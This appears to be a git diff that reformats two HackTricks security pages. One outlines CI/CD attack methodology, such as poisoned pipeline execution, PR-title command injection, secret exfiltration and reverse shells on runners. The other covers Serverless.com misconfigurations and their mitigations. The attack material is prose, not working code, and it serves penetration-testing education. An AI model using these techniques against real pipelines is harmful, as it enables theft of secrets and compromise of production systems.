+- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**.
+  - **Register**: Some platforms will just allow external users to create an account.
+  - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example).
+  - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo.
+- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**.
+  - If no secret is in place, the attacker could abuse the webhook of the third party platform
+  - If the secret is in the URL, the same happens and the attacker also have the secret
+- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid:
+  - Compromise the main branch to **compromise production**.
+  - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines).
+  - **Compromise the pipeline** (check next section)
 
 ## Pipelines Pentesting Methodology
 
@@ -67,36 +53,36 @@ The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM reposi
 
 For a malicious actor to be successful performing a PPE attack he needs to be able to:
 
-* Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
-  * Note that sometimes an **external PR count as "write access"**.
-* Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
-  * For this, he might need to be able to **bypass branch protections**.
+- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access).
+  - Note that sometimes an **external PR count as "write access"**.
+- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**.
+  - For this, he might need to be able to **bypass branch protections**.
 
 There are 3 PPE flavours:
 
-* **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
-* **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
-* **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
-  * **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
+- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed.
+- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config).
+- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR.
+  - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**.
 
 ### Exploitation Benefits
 
 Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation:
 
-* **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
-  * Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
-* **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
-  * **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
-  * **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
-  * **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
-  * **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
-* **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
+- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible.
+  - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**.
+- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further.
+  - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**.
+  - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**.
+  - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**.
+  - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further.
+- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**.
 
 ## More relevant info
 
 ### Tools & CIS Benchmark
 
-* [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
+- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time.
 
 ### Top 10 CI/CD Security Risk
 
@@ -104,28 +90,15 @@ Check this interesting article about the top 10 CI/CD risks according to Cider:
 
 ### Labs
 
-* On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
-* Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
+- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it
+- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat)
 
 ### Automatic Tools
 
-* [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
+- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code.
 
 ## References
 
-* [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm\_source=github\&utm\_medium=github\_page\&utm\_campaign=ci%2fcd%20goat\_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422)
+- [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md
similarity index 64%
rename from pentesting-ci-cd/serverless.com-security.md
rename to src/pentesting-ci-cd/serverless.com-security.md
index 5d61c2b1c..007bf5cc6 100644
--- a/pentesting-ci-cd/serverless.com-security.md
+++ b/src/pentesting-ci-cd/serverless.com-security.md
@@ -1,19 +1,6 @@
 # Serverless.com Security
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -190,23 +177,23 @@ functions:
 
 **Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time.
 
-*   **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
+- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters.
 
-    ```yaml
-    functions:
-      hello:
-        handler: handler.hello
-        environment:
-          TABLE_NAME: ${self:custom.tableName}
-    ```
+  ```yaml
+  functions:
+    hello:
+      handler: handler.hello
+      environment:
+        TABLE_NAME: ${self:custom.tableName}
+  ```
 
--   **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
+* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`.
 
-    ```yaml
-    custom:
-      tableName: my-dynamodb-table
-      stage: ${opt:stage, 'dev'}
-    ```
+  ```yaml
+  custom:
+    tableName: my-dynamodb-table
+    stage: ${opt:stage, 'dev'}
+  ```
@@ -329,8 +316,9 @@ serverless #Choose first one (AWS / Node.js / HTTP API) This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function: -{% tabs %} -{% tab title="handler.js" %} +{{#tabs }} +{{#tab name="handler.js" }} + ```javascript exports.hello = async (event) => { return { @@ -338,12 +326,13 @@ exports.hello = async (event) => { body: JSON.stringify({ message: "Go Serverless v4! Your function executed successfully!", }), - }; -}; + } +} ``` -{% endtab %} -{% tab title="serverless.yml" %} +{{#endtab }} +{{#tab name="serverless.yml" }} + ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -364,8 +353,9 @@ functions: path: / method: get ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} 4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`. 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) @@ -382,7 +372,7 @@ Resources: Type: AWS::IAM::Role Properties: AssumeRolePolicyDocument: - Version: '2012-10-17' + Version: "2012-10-17" Statement: - Effect: Allow Principal: @@ -391,7 +381,7 @@ Resources: - sts:AssumeRole Condition: StringEquals: - sts:ExternalId: !Sub 'ServerlessFramework-${OrgUid}' + sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" Path: / RoleName: !Ref RoleName ManagedPolicyArns: @@ -399,13 +389,13 @@ Resources: ReporterFunction: Type: Custom::ServerlessFrameworkReporter Properties: - ServiceToken: 'arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec' + ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" OrgUid: !Ref OrgUid RoleArn: !GetAtt SFRole.Arn Alias: !Ref Alias Outputs: SFRoleArn: - Description: 'ARN for the IAM Role used by Serverless Framework' + Description: "ARN for the IAM Role used by Serverless Framework" Value: !GetAtt SFRole.Arn Parameters: OrgUid: @@ -427,21 +417,21 @@ Parameters: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::486128539022:root" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" - } - } + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::486128539022:root" + }, + "Action": "sts:AssumeRole", + "Condition": { + "StringEquals": { + "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" } - ] + } + } + ] } ``` @@ -449,13 +439,14 @@ Parameters: 5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas. -{% tabs %} -{% tab title="createCustomer.js" %} +{{#tabs }} +{{#tab name="createCustomer.js" }} + ```javascript -'use strict' -const AWS = require('aws-sdk') +"use strict" +const AWS = require("aws-sdk") module.exports.createCustomer = async (event) => { - const body = JSON.parse(Buffer.from(event.body, 'base64').toString()) + const body = JSON.parse(Buffer.from(event.body, "base64").toString()) const dynamoDb = new AWS.DynamoDB.DocumentClient() const putParams = { TableName: process.env.DYNAMODB_CUSTOMER_TABLE, @@ -470,9 +461,11 @@ module.exports.createCustomer = async (event) => { } } ``` -{% endtab %} -{% tab title="serverless.yml" %} +{{#endtab }} + +{{#tab name="serverless.yml" }} + ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -489,13 +482,13 @@ provider: iam: role: statements: - - Effect: 'Allow' + - Effect: "Allow" Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' + - "dynamodb:PutItem" + - "dynamodb:Get*" + - "dynamodb:Scan*" + - "dynamodb:UpdateItem" + - "dynamodb:DeleteItem" Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} functions: @@ -526,8 +519,9 @@ resources: KeyType: HASH TableName: ${self:service}-customerTable-${sls:stage} ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} 6. Deploy it running **`serverless deploy`** 1. The deployment will be performed via a CloudFormation Stack @@ -549,58 +543,55 @@ When no permissions are specified for the a Lambda function, a role with permiss ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Action": [ - "logs:CreateLogStream", - "logs:CreateLogGroup", - "logs:TagResource" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" - ], - "Effect": "Allow" - }, - { - "Action": [ - "logs:PutLogEvents" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" - ], - "Effect": "Allow" - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Action": [ + "logs:CreateLogStream", + "logs:CreateLogGroup", + "logs:TagResource" + ], + "Resource": [ + "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" + ], + "Effect": "Allow" + }, + { + "Action": ["logs:PutLogEvents"], + "Resource": [ + "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" + ], + "Effect": "Allow" + } + ] } ``` - - #### **Mitigation Strategies** -* **Principle of Least Privilege:** Assign only necessary permissions to each function. +- **Principle of Least Privilege:** Assign only necessary permissions to each function. - ```yaml - provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} - ``` -* **Use Separate Roles:** Differentiate roles based on function requirements. + ```yaml + provider: + [...] + iam: + role: + statements: + - Effect: 'Allow' + Action: + - 'dynamodb:PutItem' + - 'dynamodb:Get*' + - 'dynamodb:Scan*' + - 'dynamodb:UpdateItem' + - 'dynamodb:DeleteItem' + Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} + ``` -*** +- **Use Separate Roles:** Differentiate roles based on function requirements. + +--- ### **Insecure Secrets and Configuration Management** @@ -608,9 +599,8 @@ Storing sensitive information (e.g., API keys, database credentials) directly in The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**! -{% hint style="danger" %} -Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** -{% endhint %} +> [!CAUTION] +> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** For example, the following example will use SSM to get an environment variable: @@ -622,17 +612,16 @@ provider: And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**. -{% hint style="success" %} -The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. -{% endhint %} +> [!TIP] +> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. #### **Mitigation Strategies** -* **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** -* **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. -* **Access Controls:** Restrict access to secrets based on roles. +- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** +- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. +- **Access Controls:** Restrict access to secrets based on roles. -*** +--- ### **Vulnerable Code and Dependencies** @@ -640,18 +629,19 @@ Outdated or insecure dependencies can introduce vulnerabilities, while improper #### **Mitigation Strategies** -* **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. +- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. - ```yaml - plugins: - - serverless-webpack - - serverless-plugin-snyk - ``` -* **Input Validation:** Implement strict validation and sanitization of all inputs. -* **Code Reviews:** Conduct thorough reviews to identify security flaws. -* **Static Analysis:** Use tools to detect vulnerabilities in the codebase. + ```yaml + plugins: + - serverless-webpack + - serverless-plugin-snyk + ``` -*** +- **Input Validation:** Implement strict validation and sanitization of all inputs. +- **Code Reviews:** Conduct thorough reviews to identify security flaws. +- **Static Analysis:** Use tools to detect vulnerabilities in the codebase. + +--- ### **Inadequate Logging and Monitoring** @@ -659,17 +649,18 @@ Without proper logging and monitoring, malicious activities may go undetected, d #### **Mitigation Strategies** -* **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. +- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. - ```yaml - plugins: - - serverless-plugin-datadog - ``` -* **Enable Detailed Logging:** Capture essential information without exposing sensitive data. -* **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. -* **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. + ```yaml + plugins: + - serverless-plugin-datadog + ``` -*** +- **Enable Detailed Logging:** Capture essential information without exposing sensitive data. +- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. +- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. + +--- ### **Insecure API Gateway Configurations** @@ -677,45 +668,48 @@ Open or improperly secured APIs can be exploited for unauthorized access, Denial #### **Mitigation Strategies** -* **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. +- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - authorizer: aws_iam - ``` -* **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. + ```yaml + functions: + hello: + handler: handler.hello + events: + - http: + path: hello + method: get + authorizer: aws_iam + ``` - ```yaml - provider: - apiGateway: - throttle: - burstLimit: 200 - rateLimit: 100 - ``` -* **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. +- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - cors: - origin: https://yourdomain.com - headers: - - Content-Type - ``` -* **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. + ```yaml + provider: + apiGateway: + throttle: + burstLimit: 200 + rateLimit: 100 + ``` -*** +- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. + + ```yaml + functions: + hello: + handler: handler.hello + events: + - http: + path: hello + method: get + cors: + origin: https://yourdomain.com + headers: + - Content-Type + ``` + +- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. + +--- ### **Insufficient Function Isolation** @@ -723,21 +717,22 @@ Shared resources and inadequate isolation can lead to privilege escalations or u #### **Mitigation Strategies** -* **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. -* **Resource Partitioning:** Use separate databases or storage buckets for different functions. -* **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. +- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. +- **Resource Partitioning:** Use separate databases or storage buckets for different functions. +- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. - ```yaml - provider: - vpc: - securityGroupIds: - - sg-xxxxxxxx - subnetIds: - - subnet-xxxxxx - ``` -* **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. + ```yaml + provider: + vpc: + securityGroupIds: + - sg-xxxxxxxx + subnetIds: + - subnet-xxxxxx + ``` -*** +- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. + +--- ### **Inadequate Data Protection** @@ -745,22 +740,23 @@ Unencrypted data at rest or in transit can be exposed, leading to data breaches #### **Mitigation Strategies** -* **Encrypt Data at Rest:** Utilize cloud service encryption features. +- **Encrypt Data at Rest:** Utilize cloud service encryption features. - ```yaml - resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - SSESpecification: - SSEEnabled: true - ``` -* **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. -* **Secure API Communication:** Enforce encryption protocols and validate certificates. -* **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. + ```yaml + resources: + Resources: + MyDynamoDBTable: + Type: AWS::DynamoDB::Table + Properties: + SSESpecification: + SSEEnabled: true + ``` -*** +- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. +- **Secure API Communication:** Enforce encryption protocols and validate certificates. +- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. + +--- ### **Lack of Proper Error Handling** @@ -768,26 +764,27 @@ Detailed error messages can leak sensitive information about the infrastructure #### **Mitigation Strategies** -* **Generic Error Messages:** Avoid exposing internal details in error responses. +- **Generic Error Messages:** Avoid exposing internal details in error responses. - ```javascript - javascriptCopy code// Example in Node.js - exports.hello = async (event) => { - try { - // Function logic - } catch (error) { - console.error(error); - return { - statusCode: 500, - body: JSON.stringify({ message: 'Internal Server Error' }), - }; - } - }; - ``` -* **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. -* **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. + ```javascript + javascriptCopy code// Example in Node.js + exports.hello = async (event) => { + try { + // Function logic + } catch (error) { + console.error(error); + return { + statusCode: 500, + body: JSON.stringify({ message: 'Internal Server Error' }), + }; + } + }; + ``` -*** +- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. +- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. + +--- ### **Insecure Deployment Practices** @@ -795,12 +792,12 @@ Exposed deployment configurations or unauthorized access to CI/CD pipelines can #### **Mitigation Strategies** -* **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. -* **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. -* **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. -* **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. +- **Secure CI/CD Pipelines:** Implement strict access controls, multi-factor authentication (MFA), and regular audits. +- **Store Configuration Securely:** Keep deployment files free from hardcoded secrets and sensitive data. +- **Use Infrastructure as Code (IaC) Security Tools:** Employ tools like **Checkov** or **Terraform Sentinel** to enforce security policies. +- **Immutable Deployments:** Prevent unauthorized changes post-deployment by adopting immutable infrastructure practices. -*** +--- ### **Vulnerabilities in Plugins and Extensions** @@ -808,12 +805,12 @@ Using unvetted or malicious third-party plugins can introduce vulnerabilities in #### **Mitigation Strategies** -* **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. -* **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. -* **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. -* **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. +- **Vet Plugins Thoroughly:** Assess the security of plugins before integration, favoring those from reputable sources. +- **Limit Plugin Usage:** Use only necessary plugins to minimize the attack surface. +- **Monitor Plugin Updates:** Keep plugins updated to benefit from security patches. +- **Isolate Plugin Environments:** Run plugins in isolated environments to contain potential compromises. -*** +--- ### **Exposure of Sensitive Endpoints** @@ -821,12 +818,12 @@ Publicly accessible functions or unrestricted APIs can be exploited for unauthor #### **Mitigation Strategies** -* **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. -* **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. -* **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. -* **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. +- **Restrict Function Access:** Use VPCs, security groups, and firewall rules to limit access to trusted sources. +- **Implement Robust Authentication:** Ensure all exposed endpoints require proper authentication and authorization. +- **Use API Gateways Securely:** Configure API Gateways to enforce security policies, including input validation and rate limiting. +- **Disable Unused Endpoints:** Regularly review and disable any endpoints that are no longer in use. -*** +--- ### **Excessive Permissions for Team Members and External Collaborators** @@ -834,41 +831,28 @@ Granting excessive permissions to team members and external collaborators can le #### **Mitigation Strategies** -* **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. +- **Principle of Least Privilege:** Ensure that team members and collaborators have only the permissions necessary to perform their tasks. -*** +--- ### **Access Keys and License Keys Security** **Access Keys** and **License Keys** are critical credentials used to authenticate and authorize interactions with the Serverless Framework CLI. -* **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. -* **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. +- **License Keys:** They are Unique identifiers required for authenticating access to Serverless Framework Version 4 which allows to login via CLI. +- **Access Keys:** Credentials that allow the Serverless Framework CLI to authenticate with the Serverless Framework Dashboard. When login with `serverless` cli an access key will be **generated and stored in the laptop**. You can also set it as an environment variable named `SERVERLESS_ACCESS_KEY`. #### **Security Risks** 1. **Exposure Through Code Repositories:** - * Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. + - Hardcoding or accidentally committing Access Keys and License Keys to version control systems can lead to unauthorized access. 2. **Insecure Storage:** - * Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. + - Storing keys in plaintext within environment variables or configuration files without proper encryption increases the likelihood of leakage. 3. **Improper Distribution:** - * Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. + - Sharing keys through unsecured channels (e.g., email, chat) can result in interception by malicious actors. 4. **Lack of Rotation:** - * Not regularly rotating keys extends the exposure period if keys are compromised. + - Not regularly rotating keys extends the exposure period if keys are compromised. 5. **Excessive Permissions:** - * Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. + - Keys with broad permissions can be exploited to perform unauthorized actions across multiple resources. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
